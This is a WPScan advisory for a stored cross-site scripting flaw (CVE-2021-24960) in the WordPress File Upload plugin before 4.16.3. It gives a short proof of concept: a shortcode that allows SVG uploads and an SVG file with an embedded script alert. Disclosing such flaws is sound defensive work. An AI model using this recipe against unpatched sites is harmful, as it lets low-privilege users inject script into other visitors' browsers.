WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WordPress File Upload < 4.16.3 - Contributor+ Stored Cross-Site Scripting via Malicious SVG

Description

The plugin allows users with a role as low as Contributor to configure the upload form in a way that allows uploading of SVG files, which could be then be used for Cross-Site Scripting attacks

Proof of Concept

1. As a contributor (or above) add the following shortcode to a post: [wordpress_file_upload uploadpatterns="*.svg"]
2. Preview/view the post and upload the following xss.svg file <svg xmlns:svg="http://www.w3.org/2000/svg"><svg:script>alert(/XSS/)</svg:script></svg>
3. Go to /wp-content/uploads/xss.svg to trigger the XSS

Affects Plugins

wp-file-upload
Fixed in version 4.16.3
wordpress-file-upload-pro
Fixed in version 4.16.3

References

CVE
CVE-2021-24960
URL
https://plugins.trac.wordpress.org/changeset/2677722

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID
18902832-2973-498d-808e-c75d1aedc11e

Timeline

Publicly Published

2022-02-14 (about 1 years ago)

Added

2022-02-14 (about 1 years ago)

Last Updated

2022-04-08 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin